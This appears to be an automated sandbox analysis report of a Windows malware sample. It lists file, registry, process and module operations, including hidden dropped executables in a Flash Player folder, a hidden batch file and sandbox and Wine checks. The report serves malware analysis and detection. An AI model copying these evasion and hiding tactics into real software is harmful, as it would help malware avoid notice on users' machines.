c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin	18.96 KB (19413 bytes)	MD5: e485ce36ccb80721109792301f591596 SHA1: 61e99372d88b5d6412a3e465316e9622c3ff25d4 SHA256: 68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06	File Actions Show Properties Download

Host Behavior

File (35)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\popupkiller.exe	share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\stimulator.exe	share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\TOOLS\execute.exe	share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	\\.\NPF_NdisWanIp	share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	4	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	2	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	type = extended	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	type = size, size_out = 196608	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming	type = time	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	size = 196608, size_out = 196608	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat	size = 200	1	Fn Data

Registry (267)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\GDIPlus	-	4	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP	-	4	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM	-	5	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\IMEJP	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Keyboard	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\wfs	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\SkyDrive	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds	-	4	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Fax	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\FTP	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Kaev	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Lukuip	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Boteun	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\WINE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\WINE	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	4	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	5	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	5	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	6	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	4	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	4	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Get Key Info	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	93	Fn
Get Key Info	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	4	Fn
Get Key Info	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	1	Fn
Get Key Info	HKEY_CURRENT_USER\SOFTWARE\Microsoft	-	2	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	"C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"	os_pid = 0x7a8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE		1	Fn
Create	"C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"	os_pid = 0x7f0, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (572)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x76b60000	1	Fn
Load	SXS.DLL	base_address = 0x74940000	1	Fn
Load	KERNEL32	base_address = 0x759f0000	1	Fn
Load	kernel32	base_address = 0x759f0000	15	Fn
Load	shell32	base_address = 0x75c50000	2	Fn
Load	NTDLL	base_address = 0x77270000	1	Fn
Load	user32	base_address = 0x75790000	3	Fn
Load	ntdll	base_address = 0x77270000	2	Fn
Load	IPHlpApi	base_address = 0x74920000	1	Fn
Load	User32	base_address = 0x75790000	1	Fn
Load	KERNEL32.dll	base_address = 0x759f0000	101	Fn
Load	USER32.dll	base_address = 0x75790000	19	Fn
Load	CRYPT32.dll	base_address = 0x758d0000	2	Fn
Load	ADVAPI32.dll	base_address = 0x756e0000	39	Fn
Load	SHELL32.dll	base_address = 0x75c50000	3	Fn
Load	SHLWAPI.dll	base_address = 0x750d0000	20	Fn
Load	PSAPI.DLL	base_address = 0x74eb0000	1	Fn
Load	ole32.dll	base_address = 0x75450000	6	Fn
Load	GDI32.dll	base_address = 0x75130000	8	Fn
Load	WININET.dll	base_address = 0x75350000	10	Fn
Load	urlmon.dll	base_address = 0x76c40000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76b60000	1	Fn
Load	Secur32.dll	base_address = 0x748e0000	1	Fn
Load	SbieDll.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759f0000	3	Fn
Get Handle	c:\users\aetadzjz\appdata\roaming\iuoldw.exe	base_address = 0x400000	2	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x76b60000	1	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75450000	1	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x75790000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77270000	2	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\aetadzjz\appdata\roaming\iuoldw.exe	process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75a05235	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x76bc70a1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = DispCallFunc, address_out = 0x76b73dcf	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x76b707b7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x76b91ca9	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = CreateTypeLib2, address_out = 0x76b78e70	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromUdate, address_out = 0x76b77684	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarUdateFromDate, address_out = 0x76b7cc98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetAltMonthNames, address_out = 0x76ba903a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x76b76231	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x76b75fea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR4, address_out = 0x76b83f94	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR8, address_out = 0x76b84e9e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromDate, address_out = 0x76badb72	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromI4, address_out = 0x76b92a8c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromCy, address_out = 0x76bad737	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromDec, address_out = 0x76bae015	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x76bad1c4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x76bad48c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x76bad4c6	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x76bad509	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetIID, address_out = 0x76b7e7bb	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x76b7e496	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x76bad53f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormat, address_out = 0x76bb2055	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatDateTime, address_out = 0x76bb20ea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatNumber, address_out = 0x76bb2151	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatPercent, address_out = 0x76bb21f5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatCurrency, address_out = 0x76bb2288	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarWeekdayName, address_out = 0x76bb2335	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMonthName, address_out = 0x76bb23d5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x76b85934	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x76b85a98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCat, address_out = 0x76b859b4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x76bde405	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarEqv, address_out = 0x76bdef07	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x76bdf00a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarImp, address_out = 0x76bdef47	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x76bdf15e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x76bddbd4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x76bdecfa	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarPow, address_out = 0x76bdea66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x76bdd332	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x76bdee2e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAbs, address_out = 0x76bdca11	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFix, address_out = 0x76bdcc5f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarInt, address_out = 0x76bdcde7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x76bdc802	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x76bdec66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarRound, address_out = 0x76bdd155	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x76b7b0dc	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecAdd, address_out = 0x76b95f3e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecCmp, address_out = 0x76b84fd0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCat, address_out = 0x76b80d2c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyMulI4, address_out = 0x76b959ed	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCmp, address_out = 0x76b6f8b8	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstanceEx, address_out = 0x75499d4e	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75460782	1	Fn
Get Address	c:\windows\syswow64\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x757a7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromWindow, address_out = 0x757b3150	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromRect, address_out = 0x757ce7a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromPoint, address_out = 0x757b5281	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumDisplayMonitors, address_out = 0x757b451a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMonitorInfoA, address_out = 0x757b4413	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x75a1cfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumResourceTypesA, address_out = 0x75a80efd	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = Shell_NotifyIconA, address_out = 0x75e98af2	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x7728fb18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a010ff	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetDesktopWindow, address_out = 0x757b0a19	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7729e026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a011a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a01b00	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtYieldExecution, address_out = 0x7728ff2c	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x77290028	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x75a053c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a01282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a01410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a03ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x75a0196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x75a01826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x75a845bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLongPathNameA, address_out = 0x75a8437f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75a1d802	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74929263	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x75a1d9b0	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x75e97078	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumWindows, address_out = 0x757ad1cf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x757a9a55	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumThreadWindows, address_out = 0x757b3961	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x75a07a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75a049d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a089b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x772b1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x75a110b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a034d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x75a035b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a02d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x772a45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a0dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x75a05a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a0103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a0170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x75a01400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x75a05a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x75a1d9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x75a2d075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75a1d5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x75a05151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75a1ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a017ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a0469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75a01ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x75a01886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
